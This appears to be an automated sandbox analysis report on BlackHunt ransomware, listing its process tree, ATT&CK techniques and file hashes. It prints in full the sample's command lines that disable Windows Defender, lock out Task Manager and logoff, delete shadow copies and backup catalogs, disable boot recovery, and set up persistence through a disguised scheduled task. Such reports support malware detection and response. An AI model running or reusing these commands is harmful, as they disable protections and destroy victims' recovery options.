- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2688 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2156
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe" /F2⤵PID:1696
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe" /F3⤵
- Creates scheduled task(s)
PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2848
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2024
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2344
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1712
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2944
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2268
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:548
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2080
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2592
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2100
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1484
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1472
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5ea061a10be60646c9f9132c97a7445c8
SHA1564933f785e331620771e2c2ec592b4466e91fe2
SHA2566f0143fa2dfb976881798125f74d7045250ca70005f8b3b9b832296881a1d7a9
SHA512c08d63fd93756c7fb08f19c13b5333a0a62549e97d883ae309ef1308ec35e75b333091218eeeec82cf7e32789f5dee58b9d878e15f057955f15b50c8ceac71af
-
Filesize
684B
MD53ccb293e8e5831a316ce9e138754dfcc
SHA1f28080093bafaabde734a42051c54d0620edce46
SHA2565217b761b4725b9050dba40f36284a201f58b424f29f4c75c74e91ee2234f930
SHA5123702efc2924a14c08262f2558bda438004209e0053ffc3c2716ae22ec4d8552b9dfb459bd1dc4c23e9696d1642f84118096977db94b6b0a36b8744f73cbfd097
-
Filesize
1KB
MD538a6d295c7a1c290c1b353b71cc282dd
SHA18c9326df021101650214e0506e54bb8399a1bab8
SHA25677b37b737d069f67a9e360113d6cc7c6c41474acc4ffbfbe40c2cdc03460db6f
SHA5120f1f9d8a1994f8ce36239086a10f553e33373af86cce3997854dc98df08ab0dbdcca6b79eedc5fe90a7bbc9412916559071a9d67dfa1c7921ed3a59b40fa54d5